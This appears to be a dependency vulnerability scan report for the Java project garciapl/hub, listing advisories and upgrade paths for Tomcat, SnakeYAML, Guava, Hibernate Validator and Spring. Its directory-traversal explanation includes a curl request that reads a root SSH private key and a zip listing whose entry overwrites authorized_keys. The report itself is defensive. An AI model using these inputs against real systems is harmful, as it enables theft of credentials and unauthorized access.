org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.

The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.

Remediation

Upgrade org.yaml:snakeyaml to version 2.0 or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Access Restriction Bypass. If the ROOT (default) web application is configured to use FORM authentication, a specially crafted URL could be used to trigger a redirect to a URL of the attacker's choice.

The vulnerability is limited to the ROOT (default) web application.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.93, 9.0.80, 10.1.13, 11.0.0-M11 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.

NOTE: After upgrading to the fixed version, setFileCountMax() must be set explicitly to avoid this vulnerability.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.85, 9.0.71, 10.1.5, 11.0.0-M3 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Directory Traversal. Security constraints defined by annotations of Servlets were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating file paths with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.5, 8.5.28, 8.0.50, 7.0.85 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.hibernate:hibernate-validator
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.hibernate:hibernate-validator@5.3.6.Final
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.0.0.RELEASE.

Overview

org.hibernate:hibernate-validator is a Hibernate Validator Engine Relocation Artifact.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site into accepting a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, particularly those included in user input, so that they are not interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > as &gt; so that they are interpreted and displayed as themselves in text, while within the code itself they are used for HTML tags. If malicious content is injected into an application that escapes special characters, and that content uses < and > as HTML tags, the browser will nonetheless not interpret those characters as HTML tags if they have been correctly escaped in the application code, and the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type        Origin   Description
Stored      Server   The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected   Server   The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user's browser.
DOM-based   Client   The attacker forces the user's browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated              The attacker injects code that appears safe, but is then rewritten and modified by the browser while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade org.hibernate:hibernate-validator to version 6.0.18.Final, 6.1.0.Final or higher.

References

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.guava:guava@21.0

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 com.google.guava:guava@21.0
    Remediation: Upgrade to com.google.guava:guava@24.1.1-android.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset), immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. During deserialization, two Guava classes accept a caller-specified size parameter and eagerly allocate an array of that size:

  • AtomicDoubleArray (when serialized with Java serialization)
  • CompoundOrdering (when serialized with GWT serialization)

An attacker may be able to send a specially crafted request that will then cause the server to allocate all of its memory, without validating whether the data size is reasonable.

Details

Serialization is the process of converting an object into a sequence of bytes which can be persisted to a disk or database or sent through streams. The reverse process of creating an object from a sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (storing the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collections). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.google.guava:guava to version 24.1.1, 24.1.1-jre or higher.

References

medium severity

Access Restriction Bypass

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Access Restriction Bypass. The URL pattern of "" (the empty string), which exactly maps to the context root, was not correctly handled, which caused the constraint to be ignored. It was therefore possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.85, 8.0.50, 8.5.28, 9.0.5 or higher.

References

medium severity

HTTP Request Smuggling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. When responding to new h2c connection requests, Apache Tomcat could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.2, 9.0.43, 8.5.63 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure. A bug in the tracking of connection closures can lead to reuse of user sessions in a new connection.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.32, 9.0.10 or higher.

References

medium severity

Multipart Content Pollution

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-web@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-core@4.3.13.RELEASE
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework:spring-webmvc@7.0.0-M4 org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-expression@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE org.springframework.boot:spring-boot@1.5.9.RELEASE org.springframework:spring-context@7.0.0-M4 org.springframework:spring-aop@7.0.0-M4 org.springframework:spring-beans@7.0.0-M4 org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Multipart Content Pollution. It provides client-side support for multipart requests. When the server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could lead to privilege escalation, for example, if the part content represents a username or user roles.

Remediation

Upgrade org.springframework:spring-core to version 4.3.14.RELEASE, 5.0.5.RELEASE or higher.

References

medium severity

HTTP Request Smuggling

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.17.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.17.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. If an HTTP/2 client connecting to Apache Tomcat exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M8, 9.0.38, 8.5.58 or higher.

References

medium severity

Open Redirect

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.16.RELEASE.
  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 org.apache.tomcat.embed:tomcat-embed-core@8.5.23
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.16.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Open Redirect. When the default servlet returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo'), a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker's choice.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.91, 8.5.34, 9.0.12 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

  • Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE org.springframework.boot:spring-boot-starter@1.5.9.RELEASE org.yaml:snakeyaml@1.17
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.0.RELEASE.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS). The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.

Note: While the maintainer acknowledges the existence of the issue, they believe it should be solved by sanitizing the inputStream to the parser.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

